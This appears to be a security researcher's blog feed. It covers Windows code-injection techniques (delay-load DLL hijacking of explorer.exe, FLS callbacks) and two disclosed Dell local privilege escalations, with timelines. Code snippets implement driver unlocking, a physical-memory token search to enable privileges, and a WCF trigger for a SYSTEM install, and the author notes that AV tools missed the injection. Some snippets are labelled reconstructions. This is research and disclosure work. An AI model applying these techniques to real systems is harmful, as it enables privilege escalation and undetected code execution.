Overall, this was quite a bit of fun. Although ASLR/PIE still poses an issue, this is a local bug, and there isn’t much that brute forcing and a little investigation can’t take care of. NX/RELRO/Canary/SSP/ASCII armor have all been successfully neutralized. I hacked up a PoC that should work on Ubuntu boxes as configured, but it brute forces offsets. Test runs show it can take up to 2 hours to successfully pop a box. Full code can be found below.
This is just a placeholder post to link off to the paper Stephen Breen and I wrote on
abusing token privileges. You can read the entire paper here[0]. I also
recommend checking out the blogpost he posted on Foxglove here[1].
I always tell myself that I’ll try posting more frequently on my blog, and yet
here I am, two years later. Perhaps this post will provide the necessary
motivation to conduct more public research. I do love it.
This post details a novel remote code injection technique I discovered while
playing around with delay loading DLLs. It allows for the injection of
arbitrary code into arbitrary remote, running processes, provided that they
implement the abused functionality. To make it abundantly clear, this is not
an exploit, it’s simply another strategy for migrating into other processes.
Modern code injection techniques typically rely on a variation of two different
win32 API calls: CreateRemoteThread and NtQueueApc. Endgame recently put out a
great article[0] detailing ten different methods of process injection. While not
all of them allow for injection into remote processes, particularly those
already running, it does detail the most common, public variations. This
strategy is more akin to inline hooking, though we’re not touching the IAT
and we don’t require our code to already be in the process. There are no calls
to NtQueueApc or CreateRemoteThread, and no need for thread or process
suspension. There are some limitations, as with anything, which I’ll detail
below.
Delay Load DLL
Delay loading is a linker strategy that allows for the lazy loading of DLLs.
Executables commonly load all necessary dynamically linked libraries at runtime
and perform the IAT fix-ups then. Delay loading, however, allows for
these libraries to be lazy loaded at call time, supported by a pseudo IAT
that’s fixed-up on first call. This process can be better illuminated by the
decades-old figure below:
This image comes from a great Microsoft article released in 1998 [1] that
describes the strategy quite well, but I’ll attempt to distill it here.
Portable executables contain a data directory named
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT, which you can see using dumpbin /imports
or using windbg. The structure of this entry is described in delayhlp.cpp,
included with the WinSDK:
struct InternalImgDelayDescr {
DWORD grAttrs; // attributes
LPCSTR szName; // pointer to dll name
HMODULE * phmod; // address of module handle
PImgThunkData pIAT; // address of the IAT
PCImgThunkData pINT; // address of the INT
PCImgThunkData pBoundIAT; // address of the optional bound IAT
PCImgThunkData pUnloadIAT; // address of optional copy of original IAT
DWORD dwTimeStamp; // 0 if not bound,
// O.W. date/time stamp of DLL bound to (Old BIND)
};
The table itself contains RVAs, not pointers. We can find the delay directory
offset by parsing the file header:
0:022> lm m explorer
start end module name
00690000 00969000 explorer (pdb symbols)
0:022> !dh 00690000 -f
File Type: EXECUTABLE IMAGE
FILE HEADER VALUES
[...]
68A80 [ 40] address [size] of Load Configuration Directory
0 [ 0] address [size] of Bound Import Directory
1000 [ D98] address [size] of Import Address Table Directory
AC670 [ 140] address [size] of Delay Import Directory
0 [ 0] address [size] of COR20 Header Directory
0 [ 0] address [size] of Reserved Directory
The first entry and its delay-linked DLL can be seen in the following:
This means that WINMM is dynamically linked to explorer.exe, but delay loaded,
and will not be loaded into the process until the imported function is invoked.
Once loaded, a helper function fixes up the pseudo IAT by using GetProcAddress
to locate the desired function and patching the table at runtime.
The pseudo IAT referenced is separate from the standard PE IAT; this IAT
is specifically for the delay load functions, and is referenced from the delay
descriptor. So for example, in WINMM.dll’s case, the pseudo IAT for WINMM is
at RVA 000b1000. The second delay descriptor entry would have a separate RVA
for its pseudo IAT, and so on and so forth.
Using WINMM as our delay example, explorer imports one function from it, PlaySoundW.
In my particular running instance, it has not been invoked, so the pseudo IAT
has not been fixed up yet. We can see this by dumping its pseudo IAT entry:
Each DLL entry is null terminated. The above pointer shows us that the existing
entry is merely a springboard thunk within the Explorer process. This takes
us here:
The tailMerge function is a linker-generated stub that’s compiled in per-DLL,
not per function. The __delayLoadHelper2 function is the magic that
handles the loading and patching of the pseudo IAT. Documented in delayhlp.cpp,
this function handles calling LoadLibrary/GetProcAddress and patching the
pseudo IAT. As a demonstration of how this looks, I compiled a binary that
delay links dnslib. Here’s the process of resolution of
DnsAcquireContextHandle:
Now the pseudo IAT entry has been patched up and the correct function is
invoked on subsequent calls. This has the additional side effect of leaving
the pseudo IAT as both executable and writable:
At this point, the DLL has been loaded into the process and the pseudo IAT
patched up. In another twist, not all functions are resolved on
load, only the one that is invoked. This leaves certain entries in the
pseudo IAT in a mixed state:
00741044 00726afa explorer!_imp_load__UnInitProcessPriv
00741048 7467f845 DUI70!InitThread
0074104c 00726b0f explorer!_imp_load__UnInitThread
00741050 74670728 DUI70!InitProcessPriv
0:022> lm m DUI70
start end module name
74630000 746e2000 DUI70 (pdb symbols)
In the above, two of the four functions are resolved and the DUI70.dll library
is loaded into the process. In each entry of the delay load descriptor, the
structure referenced above maintains an RVA to the HMODULE. If the module
isn’t loaded, it will be null. So when a delayed function is invoked that’s
already loaded, the delay helper function will check its entry to determine if
a handle to it can be used:
HMODULE hmod = *idd.phmod;
if (hmod == 0) {
if (__pfnDliNotifyHook2) {
hmod = HMODULE(((*__pfnDliNotifyHook2)(dliNotePreLoadLibrary, &dli)));
}
if (hmod == 0) {
hmod = ::LoadLibraryEx(dli.szDll, NULL, 0);
}
The idd structure is just an instance of the InternalImgDelayDescr described
above and passed into the __delayLoadHelper2 function from the linker
tailMerge stub. So if the module is already loaded, as referenced from delay
entry, then it uses that handle instead. It does NOT attempt to LoadLibrary
regardless of this value; this can be used to our advantage.
Another note here is that the delay loader supports notification hooks. There
are six states we can hook into: processing start, pre load library, fail
load library, pre GetProcAddress, fail GetProcAddress, and end processing. You
can see how the hooks are used in the above code sample.
Finally, in addition to delay loading, the portable executable also supports
delay library unloading. It works pretty much how you’d expect it, so we
won’t be touching on it here.
Limitations
Before detailing how we might abuse this (though it should be fairly obvious),
it’s important to note the limitations of this technique. It is not completely
portable, and using pure delay load functionality it cannot be made to be so.
The glaring limitation is that the technique requires the remote process to be
delay linked. A brief crawl of some local processes on my host shows many
Microsoft applications are: dwm, explorer, cmd. Many non-Microsoft
applications are as well, including Chrome. It is additionally a well
supported function of the portable executable, and exists today on modern
systems.
Another limitation is that, because at its core it relies on LoadLibrary,
there must exist a DLL on disk. There is no way to LoadLibrary from memory
(unless you use one of the countless techniques that do exactly that, though none of them use LoadLibrary…).
In addition to implementing the delay load, the remote process must implement
functionality that can be triggered. Instead of doing a CreateRemoteThread,
SendNotifyMessage, or ResumeThread, we rely on the fetch to the pseudo IAT, and
thus we must be able to trigger the remote process into performing this
action/executing this function. This is generally pretty easy if you’re using
the suspended process/new process strategy, but may not be trivial on running
applications.
Finally, any process that does not allow unsigned libraries to be loaded will
block this technique. This is controlled by ProcessSignaturePolicy and can be
set with SetProcessMitigationPolicy[2]; it is unclear how many apps are using
this at the moment, but Microsoft Edge was one of the first big products to be
employing this policy. This technique is also impacted by the
ProcessImageLoadPolicy policy, which can be set to restrict loading of images
from a UNC share.
Abuse
When discussing an ability to inject code into a process, there are three
separate cases an attacker may consider, and some additional edge situations
within remote processes. Local process injection is simply the execution of
shellcode/arbitrary code within the current process. Suspended process is the
act of spawning a new, suspended process from an existing, controlled one and
injecting code into it. This is a fairly common strategy to employ for
migrating code, setting up backup connections, or establishing a known process
state prior to injection. The final case is the running remote process.
The running remote process is an interesting case with several caveats that
we’ll explore below. I won’t detail suspended processes, as it’s essentially
the same as a running process, but easier. It’s easier because many
applications actually just load the delay library at runtime, either because
the functionality is environmentally keyed and required then, or because
another loaded DLL is linked against it and requires it. Refer to the source
code for the project for an implementation of suspended process injection [3].
Local Process
The local process is the most simple and arguably the most useless for this
strategy. If we can inject and execute code in this manner, we might as well
link against the library we want to use. It serves as a fine introduction to
the topic, though.
The first thing we need to do is delay link the executable against something.
For various reasons I originally chose dnsapi.dll. You can specify delay
load DLLs via the linker options for Visual Studio.
With that, we need to obtain the RVA for the delay directory. This can be
accomplished with the following function:
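A minimal sketch of such a helper (a reconstruction assuming the usual PE header walk, not necessarily the exact code from the project) might look like:
#include <windows.h>

// Sketch: resolve the delay import descriptor table for a loaded module by
// walking its PE headers (IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT is index 13;
// PIMAGE_DELAYLOAD_DESCRIPTOR comes from winnt.h in recent SDKs).
PIMAGE_DELAYLOAD_DESCRIPTOR GetDelayDirectory(HMODULE hModule)
{
    PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)hModule;
    PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)((BYTE *)hModule + pDos->e_lfanew);

    IMAGE_DATA_DIRECTORY dir =
        pNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT];
    if (dir.VirtualAddress == 0)
        return NULL;

    // the directory stores RVAs, so rebase against the module
    return (PIMAGE_DELAYLOAD_DESCRIPTOR)((BYTE *)hModule + dir.VirtualAddress);
}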
Should be pretty clear what we’re doing here. Once we’ve got the correct table
entry, we need to mark the entry’s DllName as writable, overwrite it with our
custom DLL name, and restore the protection mask:
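Roughly like this (again a sketch using the winnt.h descriptor layout; the replacement name has to fit within the original string):
#include <windows.h>
#include <string.h>

// Sketch: make the descriptor's DllName writable, swap in our DLL's name,
// then restore the original protection.
void SwapDelayDllName(HMODULE hModule, PIMAGE_DELAYLOAD_DESCRIPTOR pDesc,
                      const char *szNewDll)
{
    char *szName = (char *)hModule + pDesc->DllNameRVA;
    SIZE_T cb = strlen(szName) + 1;
    DWORD dwOld = 0;

    if (strlen(szNewDll) + 1 > cb)      // keep within the existing buffer
        return;

    VirtualProtect(szName, cb, PAGE_READWRITE, &dwOld);
    memcpy(szName, szNewDll, strlen(szNewDll) + 1);
    VirtualProtect(szName, cb, dwOld, &dwOld);
}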
Now all that’s left to do is trigger the targeted function. Once triggered,
the delay helper function will snag the DllName from the table entry and load
the DLL via LoadLibrary.
Remote Process
The most interesting of cases is the running remote process. For demonstration
here, we’ll be targeting explorer.exe, as we can almost always rely on it to be
running on a workstation under the current user.
With an open handle to the explorer process, we must perform the same
searching tasks as we did for the local process, but this time in a remote
process. This is a little more cumbersome, but the code can be found in the
project repository for reference[3]. We simply grab the remote PEB, parse the
image and it’s directories, and locate the appropriate delay entry we’re
targeting.
This part is likely to prove the most unfriendly when attempting to port this
to another process; what functionality are we targeting? What function or
delay load entry is generally unused, but triggerable from the current session?
With explorer there are several options; it’s delay linked against 9 different
DLLs, each averaging 2-3 imported functions. Thankfully one of the first
functions I looked at was pretty straightforward: CM_Request_Eject_PC. This
function, exported by CFGMGR32.dll, requests that the system be ejected from
the local docking station[4]. We can therefore assume that it’s likely to be available and not fixed up in the pseudo IAT on workstations, and potentially unfixed on laptops, should the user never explicitly request the system to be ejected.
When we request for the workstation to be ejected from the docking station, the
function sends a PNP request. We use the IShellDispatch object to execute
this, which is accessed via Shell, handled by, you guessed it, explorer.
Our DLL only needs to export CM_Request_Eject_PC for us to not crash the
process; we can either pass on the request to the real DLL, or simply ignore
it. This leads us to stable and reliable remote code injection.
Remote Process – All Fixed
One interesting edge case is a remote process that you want to inject into via
delay loading, but all imported functions have been resolved in the pseudo IAT.
This is a little more complicated, but all hope is not lost.
Remember when I mentioned earlier that a handle to the delay load library is
maintained in its descriptor? This is the value that the helper function
checks for to determine if it should reload the module or not; if it’s null, it
attempts to load it, if it’s not, it uses that handle. We can abuse this check
by nulling out the module handle, thereby “tricking” the helper function into
once again loading that descriptor’s DLL.
In the discussed case, however, the pseudo IAT is all patched up; no more
trampolines into the delay load helper function. Helpfully the pseudo IAT is
writable by default, so we can simply patch in the trampoline function
ourselves and have it instantiate the descriptor all over again. In short,
this worst-case strategy requires three separate WriteProcessMemory calls: one
to null out the module handle, one to overwrite the pseudo IAT entry, and one
to overwrite the loaded DLL name.
Conclusions
I should make mention that I tested this strategy across several next gen
AV/HIPS appliances, which will go unnamed here, and none were able to detect
the cross process injection strategy. It would seem overall to be an
interesting challenge at detection; in remote processes, the strategy uses the
following chain of calls:
That’s it. The trigger functionality would be dynamic among each process, and
the loaded library would be loaded via supported and well-known Windows
facilities. I checked out a few other core Windows applications, and they all
have pretty straightforward trigger strategies.
The referenced project[3] includes both x86 and x64 support, and has been
tested across Windows 7, 8.1, and 10. It includes three functions of interest:
inject_local, inject_suspended, and inject_explorer. It expects to find
the DLL at C:\Windows\Temp\TestDLL.dll, but this can obviously be changed.
Note that it isn’t production quality; beware, here be dragons.
Special thanks to Stephen Breen for reviewing this post
This post details a local privilege escalation (LPE) vulnerability I found
in Dell’s SupportAssist[0] tool. The bug is in a kernel driver loaded by
the tool, and is pretty similar to bugs found by ReWolf in
ntiolib.sys/winio.sys[1], and those found by others in ASMMAP/ASMMAP64[2].
These bugs are pretty interesting because they can be used to bypass driver
signature enforcement (DSE) ad infinitum, or at least until they’re no longer
compatible with newer operating systems.
Dell’s SupportAssist is, according to the site, “(..) now preinstalled on most
of all new Dell devices running Windows operating system (..)”. Its primary
purpose is to troubleshoot issues and provide support capabilities both to the
user and to Dell. There’s quite a lot of functionality in this software itself,
which I spent quite a bit of time reversing and may blog about at a later date.
Bug
Calling this a “bug” is really a misnomer; the driver exposes this
functionality eagerly. It actually exposes a lot of functionality, much like
some of the previously mentioned drivers. It provides capabilities for reading
and writing the model-specific register (MSR), resetting the 1394 bus, and
reading/writing CMOS.
The driver is first loaded when the SupportAssist tool is launched, and the
filename is pcdsrvc_x64.pkms on x64 and pcdsrvc.pkms on x86. Incidentally,
this driver isn’t actually even built by Dell, but rather another company,
PC-Doctor[3]. This company provides “system health solutions” to a variety of
companies, including Dell, Intel, Yokogawa, IBM, and others. Therefore, it’s
highly likely that this driver can be found in a variety of other products…
Once the driver is loaded, it exposes a symlink to the device at
PCDSRVC{3B54B31B-D06B6431-06020200}_0 which is writable by unprivileged users
on the system. This allows us to trigger one of the many IOCTLs exposed by the
driver (approximately 30). I found a DLL used by the userland agent that served
as an interface to the kernel driver and conveniently had symbol names
available, allowing me to extract the following:
Immediately the MemDriver class jumps out. After some reversing, it appeared
that these functions do exactly as expected: allow userland services to both
read and write arbitrary physical addresses. There are a few quirks, however.
To start, the driver must first be “unlocked” in order for it to begin
processing control codes. It’s unclear to me if this is some sort of hacky
event trigger or whether the kernel developers truly believed this would
inhibit malicious access. Either way, it’s goofy. To unlock the driver, a
simple ioctl with the proper code must be sent. Once received, the driver will
process control codes for the lifetime of the system.
To unlock the driver, we just execute the following:
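Something along these lines does it (a sketch; the control code below is a placeholder name and value, only the 0xA1B2C3D4 unlock value and the device symlink come from the driver):
#include <windows.h>

// IOCTL_PCD_UNLOCK is hypothetical; substitute the driver's real unlock code.
#define IOCTL_PCD_UNLOCK 0x00000000

HANDLE UnlockDriver(void)
{
    DWORD dwRet = 0;
    DWORD dwUnlockKey = 0xA1B2C3D4;   // value the driver validates before setting its global flag

    HANDLE hDriver = CreateFileA("\\\\.\\PCDSRVC{3B54B31B-D06B6431-06020200}_0",
                                 GENERIC_READ | GENERIC_WRITE, 0, NULL,
                                 OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE)
        return NULL;

    // once this succeeds, the driver processes the rest of its control codes
    DeviceIoControl(hDriver, IOCTL_PCD_UNLOCK, &dwUnlockKey, sizeof(dwUnlockKey),
                    NULL, 0, &dwRet, NULL);
    return hDriver;
}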
Once the driver receives this control code and validates the received code
(0xA1B2C3D4), it sets a global flag and begins accepting all other control
codes.
Exploitation
From here, we could exploit this the same way rewolf did [4]: read out physical
memory looking for process pool tags, then traverse these until we identify our
process as well as a SYSTEM process, then steal the token. However, PCD
appears to give us a shortcut via getPhysicalAddress ioctl. If this does
indeed return the physical address of a given virtual address (VA), we can simply
find the physical address of our VA and enable a couple of token privileges[5] using the
writePhysicalMemory ioctl.
Keen observers will spot the problem here; the MmProbeAndLockPages call is
passing in UserMode for the KPROCESSOR_MODE, meaning we won’t be able to
resolve any kernel mode VAs, only usermode addresses.
We can still read chunks of physical memory unabated, however, as the
readPhysicalMemory function is quite simple:
They reuse a single function for reading and writing physical memory; we’ll
return to that. I decided to take a different approach than rewolf for a number
of reasons with great results.
Instead, I wanted to toggle on SeDebugPrivilege for my current process token.
This would require finding the token in memory and writing a few bytes at a
field offset. To do this, I used readPhysicalMemory to read chunks of memory
of size 0x10000000 and checked for the first field in a _TOKEN, TokenSource. In
a user token, this will be the string User32. Once we’ve identified this,
we double check that we’ve found a token by validating the TokenLuid, which we
can obtain from userland using the GetTokenInformation API.
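Grabbing that LUID from userland is straightforward; a sketch of the sort of helper the search loop below leans on (names here are illustrative, not the original code):
#include <windows.h>

// Fetch our own token's LUID (TOKEN_STATISTICS.TokenId) so a "User32" hit in
// physical memory can be confirmed as *our* token.
LUID FetchCurrentTokenId(void)
{
    HANDLE hToken = NULL;
    TOKEN_STATISTICS stats = { 0 };
    DWORD dwLen = 0;

    OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken);
    GetTokenInformation(hToken, TokenStatistics, &stats, sizeof(stats), &dwLen);
    CloseHandle(hToken);

    return stats.TokenId;
}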
In order to speed up the memory search, I only iterate over the addresses that
match the token’s virtual address byte index. Essentially, when you convert a
virtual address to a physical address (PA) the byte index, or the lower 12 bits,
do not change. To demonstrate, assume we have a VA of 0xfffff8a001cc2060.
Translating this to a physical address then:
kd> !pte fffff8a001cc2060
VA fffff8a001cc2060
PXE at FFFFF6FB7DBEDF88 PPE at FFFFF6FB7DBF1400 PDE at FFFFF6FB7E280070 PTE at FFFFF6FC5000E610
contains 000000007AC84863 contains 00000000030D4863 contains 0000000073147863 contains E6500000716FD963
pfn 7ac84 ---DA--KWEV pfn 30d4 ---DA--KWEV pfn 73147 ---DA--KWEV pfn 716fd -G-DA--KW-V
kd> ? 716fd * 0x1000 + 060
Evaluate expression: 1903153248 = 00000000`716fd060
So our physical address is 0x716fd060 (if you’d like to read more about
converting VA to PA, check out this great Microsoft article[6]). Notice the
lower 12 bits remain the same between VA/PA. The search loop then boiled down
to the following code:
uStartAddr = uStartAddr + (VirtualAddress & 0xfff);
for (USHORT chunk = 0; chunk < 0xb; ++chunk) {
    // read a 0x10000000 byte chunk of physical memory via the driver
    lpMemBuf = ReadBlockMem(hDriver, uStartAddr, 0x10000000);
    // the byte index is fixed, so we only need to check one offset per page
    for (SIZE_T i = 0; i < 0x10000000; i += 0x1000, uStartAddr += 0x1000) {
        if (memcmp((char *)lpMemBuf + i, "User32 ", 8) == 0) {
            if (TokenId <= 0x0)
                FetchTokenId();
            // TokenSource matched; confirm it's really our token via its LUID
            if (*(DWORD *)((char *)lpMemBuf + i + 0x10) == TokenId) {
                hTokenAddr = uStartAddr;
                break;
            }
        }
    }
    HeapFree(GetProcessHeap(), 0, lpMemBuf);
    if (hTokenAddr > 0x0)
        break;
}
Once we identify the PA of our token, we trigger two separate writes at offset
0x40 and offset 0x48, or the Enabled and Default fields of a _TOKEN. This
sometimes requires a few runs to get right (due to mapping, which I was too
lazy to work out), but is very stable.
Timeline
04/05/18 – Vulnerability reported
04/06/18 – Initial response from Dell
04/10/18 – Status update from Dell
04/18/18 – Status update from Dell
05/16/18 – Patched version released (v2.2)
Back in March or April I began reversing a slew of Dell applications installed
on a laptop I had. Many of them had privileged services or processes running
and seemed to perform a lot of different complex actions. I previously
disclosed a LPE in SupportAssist[0], and identified another in their Digital
Delivery platform. This post will detail a Digital Delivery vulnerability and
how it can be exploited. This was privately discovered and disclosed, and no
known active exploits are in the wild. Dell has issued a security advisory for
this issue, which can be found here[4].
I’ll have another follow-up post detailing the internals of this application
and a few others to provide any future researchers with a starting point.
Both applications are rather complex and expose a large attack surface.
If you’re interested in bug hunting LPEs in large C#/C++ applications, it’s
a fine place to begin.
Dell’s Digital Delivery[1] is a platform for buying and installing system
software. It allows users to purchase or manage software packages and reinstall
them as necessary. Once again, it comes “..preinstalled on most Dell
systems.”[1]
Bug
The Digital Delivery service runs as SYSTEM under the name DeliveryService,
which runs the DeliveryService.exe binary. A userland binary, DeliveryTray.exe,
is the user-facing component that allows users to view installed applications
or reinstall previously purchased ones.
Communication from DeliveryTray to DeliveryService is performed via a
Windows Communication Foundation (WCF) named pipe. If you’re unfamiliar with
WCF, it’s essentially a standard methodology for exchanging data between two
endpoints[2]. It allows a service to register a processing endpoint and expose
functionality, similar to a web server with a REST API.
For those following along at home, you can find the initialization of the WCF
pipe in Dell.ClientFulfillmentService.Controller.Initialize:
ServiceHost host = null;
string apiUrl = "net.pipe://localhost/DDDService/IClientFulfillmentPipeService";
Uri realUri = new Uri("net.pipe://localhost/" + Guid.NewGuid().ToString());
Tryblock.Run(delegate
{
host = new ServiceHost(classType, new Uri[]
{
realUri
});
host.AddServiceEndpoint(interfaceType, WcfServiceUtil.CreateDefaultBinding(), string.Empty);
host.Open();
}, null, null);
AuthenticationManager.Singleton.RegisterEndpoint(apiUrl, realUri.AbsoluteUri);
The endpoint is thus registered and listening and the AuthenticationManager
singleton is responsible for handling requests. Once a request comes in, the
AuthenticationManager passes this off to the AuthPipeWorker function which,
among other things, performs the following authentication:
If the process on the other end of the request is backed by a signed Dell
binary, the request is allowed and a connection may be established. If not, the
request is denied.
I noticed that this is new behavior, added sometime between 3.1 (my original
testing) and 3.5 (latest version at the time, 3.5.1001.0), so I assume Dell is
aware of this as a potential attack vector. Unfortunately, this is an
inadequate mitigation to sufficiently protect the endpoint. I was able to get
around this by simply spawning an executable signed by Dell (DeliveryTray.exe,
for example) and injecting code into it. Once code is injected, the WCF API
exposed by the privileged service is accessible.
The endpoint service itself is implemented by Dell.NamedPipe, and exposes a
dozen or so different functions. Those include:
Digital Delivery calls application install packages “entitlements”, so the
references to installation/reinstallation are specific to those packages either
available or presently installed.
One of the first functions I investigated was ReInstallEntitlement, which
allows one to initiate a reinstallation process of an installed entitlement.
This code performs the following:
This builds the arguments from the request and invokes a WCF call, which is
sent to the WCF endpoint. The ReInstallEntitlement call takes two arguments:
an entitlement ID and a RunAsUser flag. These are both controlled by the
caller.
On the server side, Dell.ClientFulfillmentService.Controller handles
implementation of these functions, and OnReInstall handles the entitlement
reinstallation process. It does a couple sanity checks, validates the package
signature, and hits the InstallationManager to queue the install request. The
InstallationManager has a job queue and background thread (WorkingThread)
that occasionally polls for new jobs and, when it receives the install job,
kicks off InstallSoftware.
Because we’re reinstalling an entitlement, the package is cached to disk and
ready to be installed. I’m going to gloss over a few installation steps
here because it’s frankly standard and menial.
The installation packages are located in
C:\ProgramData\Dell\DigitalDelivery\Downloads\Software\ and are first
unzipped, followed by an installation of the software. In my case, I was
triggering the installation of Dell Data Protection - Security Tools v1.9.1,
and if you follow along in procmon, you’ll see it startup an install process:
The run user for this process is determined by the controllable RunAsUser flag
and, if set to False, runs as SYSTEM out of the %ProgramData% directory.
During process launch of the STSetup process, I noticed the following in
procmon:
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\VERSION.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\UxTheme.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\PROPSYS.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\apphelp.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\Secur32.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\api-ms-win-downlevel-advapi32-l2-1-0.dll
Of interest here is that the parent directory, %ProgramData%\Dell\Digital Delivery\Downloads\Software, is not writable by unprivileged users, but the entitlement package folders, Dell Data Protection - Security Tools in this case, are.
This allows non-privileged users to drop arbitrary files into this
directory, granting us a DLL hijacking opportunity.
Exploitation
Exploiting this requires several steps:
1. Drop a DLL under the appropriate %ProgramData% software package directory
2. Launch a new process running an executable signed by Dell
3. Inject C# into this process (which is running unprivileged in userland)
4. Connect to the WCF named pipe from within the injected process
5. Trigger ReInstallEntitlement
Steps 4 and 5 can be performed using the following:
PipeServiceClient client = new PipeServiceClient();
client.Initialize();
while (PipeServiceClient.AppState == AppState.Initializing)
System.Threading.Thread.Sleep(1000);
EntitlementUiWrapper entitle = PipeServiceClient.EntitlementList[0];
PipeServiceClient.ReInstallEntitlement(entitle.ID, false);
System.Threading.Thread.Sleep(30000);
PipeServiceClient.CloseConnection();
The classes used above are imported from NamedPipe.dll. Note that we’re
simply choosing the first entitlement available and reinstalling it. You may
need to iterate over entitlements to identify the correct package pointing to
where you dropped your DLL.
I’ve provided a PoC on my Github here[3], and Dell has additionally released
a security advisory, which can be found here[4].
Timeline
05/24/18 – Vulnerability initially reported
05/30/18 – Dell requests further information
06/26/18 – Dell provides update on review and remediation
07/06/18 – Dell provides internal tracking ID and update on progress
07/24/18 – Update request
07/30/18 – Dell confirms they will issue a security advisory and associated CVE
08/07/18 – 90 day disclosure reminder provided
08/10/18 – Dell confirms 8/22 disclosure date alignment
08/22/18 – Public disclosure
While working on another research project (post to be released soon, will
update here), I stumbled onto a very Hexacorn[0] inspired type of code injection
technique that fit my situation perfectly. Instead of tainting the other post
with its description and code, I figured I’d release a separate post describing
it here.
When I say that it’s Hexacorn inspired, I mean that the bulk of the strategy is
similar to everything else you’ve probably seen; we open a handle to the remote
process, allocate some memory, and copy our shellcode into it. At this point we
simply need to gain control over execution flow; this is where most of
Hexacorn’s techniques come in handy. PROPagate via window properties,
WordWarping via rich edit controls, DnsQuery via code pointers, etc. Another
great example is Windows Notification Facility via user subscription callbacks
(at least in modexp’s proof of concept), though this one isn’t Hexacorn’s.
These strategies are also predicated on the process having certain capabilities
(DDE, private clipboards, WNF subscriptions), but more importantly, most, if
not all, do not work across sessions or integrity levels. This is obvious and
expected and frankly quite niche, but in my situation, a requirement.
Fibers
Fibers are “a unit of execution that must be manually scheduled by the
application”[1]. They are essentially register and stack states that can be
swapped in and out at will, and reflect upon the thread in which they are
executing. A single thread can be running at most a single fiber at a time, but
fibers can be hot swapped during execution, and their quantum is user controlled.
Fibers can also create and use fiber data. A pointer to this is stored in
TEB->NtTib.FiberData and is a per-thread structure. This is initially set
during a call to ConvertThreadToFiber. Taking a quick look at this:
We need to spawn off the test in a new thread, as the main thread will
always have a fiber instantiated and the call will fail. If we
run this in a debugger we can inspect the data after the break:
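A minimal reproduction of that test might look like the following (a sketch of the same idea, not the original snippet):
#include <windows.h>

// Thread routine: become a fiber with a recognizable fiber data pointer, then
// break in so TEB->NtTib.FiberData can be inspected in the debugger.
DWORD WINAPI FiberTest(LPVOID lpParam)
{
    ConvertThreadToFiber((LPVOID)0x41414141);   // 0x41414141 becomes the fiber data
    DebugBreak();
    return 0;
}

int main(void)
{
    HANDLE hThread = CreateThread(NULL, 0, FiberTest, NULL, 0, NULL);
    WaitForSingleObject(hThread, INFINITE);
    return 0;
}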
In addition to fiber data, fibers also have access to the fiber local storage
(FLS). For all intents and purposes, this is identical to thread local storage
(TLS)[2]. This allows all thread fibers access to shared data via a global
index. The API for this is pretty simple, and very similar to TLS. In the
following sample, we’ll allocate an index and toss some values in it. Using our
previous example as base:
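Building on the sketch above, something like this (again illustrative) allocates a slot and stashes a value in it from the fiber thread:
// Modified thread routine: allocate an FLS index (no callback yet) and store
// a recognizable value in the slot before breaking in.
DWORD WINAPI FiberTest(LPVOID lpParam)
{
    ConvertThreadToFiber((LPVOID)0x41414141);

    DWORD dwIdx = FlsAlloc(NULL);               // no callback for now
    FlsSetValue(dwIdx, (LPVOID)0x42424242);     // lands in TEB->FlsData

    DebugBreak();
    return 0;
}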
A pointer to this data is stored in the thread’s TEB, and can be extracted from
TEB->FlsData. From the above example, assume the returned FLS index for this
data is 6:
Let’s return to that FlsAlloc call from the above example. Its first
parameter is a PFLS_CALLBACK_FUNCTION[3] and is used for, according to MSDN:
An application-defined function. If the FLS slot is in use, FlsCallback is
called on fiber deletion, thread exit, and when an FLS index is freed. Specify
this function when calling the FlsAlloc function. The PFLS_CALLBACK_FUNCTION
type defines a pointer to this callback function.
Well isn’t that lovely. These callbacks are stored process wide in
PEB->FlsCallback. Let’s try it out:
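A quick experiment (sketched, not the original PoC): register an obviously bogus callback address and see what the loader does with it.
// The loader will try to call the registered callback on fiber deletion,
// thread exit, FlsFree, or process exit, with the slot value in ECX/RCX.
DWORD WINAPI FiberTest(LPVOID lpParam)
{
    ConvertThreadToFiber((LPVOID)0x41414141);

    DWORD dwIdx = FlsAlloc((PFLS_CALLBACK_FUNCTION)0x41414141);   // bogus callback address
    FlsSetValue(dwIdx, (LPVOID)0x42424242);
    return 0;
}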
What happens when we let this run to process exit?
0:001> g
(10a8.1328): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=7ffd8000 ecx=002da998 edx=002d522c esi=00000006 edi=002da028
eip=41414141 esp=0051f71c ebp=0051f734 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
41414141 ?? ???
Recall the MSDN comment about when the FLS callback is invoked: ..on fiber
deletion, thread exit, and when an FLS index is freed. This means that worst
case our code executes once the process exits and best case following a
thread’s exit or a call to FlsFree. It’s worth reiterating that the primary
thread for each process will have a fiber instantiated already; it’s quite
possible that this thread isn’t around anymore, but this doesn’t matter as the
callbacks are at the process level.
Another salient point here is the first parameter to the callback function.
This parameter is the value of whatever was in the indexed slot and is also
stashed in ECX/RCX before invoking the callback:
(aa8.169c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=7ffd9000 ecx=42424242 edx=003c522c esi=00000006 edi=003ca028
eip=41414141 esp=006ef9c0 ebp=006ef9d8 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
41414141 ?? ???
Under specific circumstances, this can be quite useful.
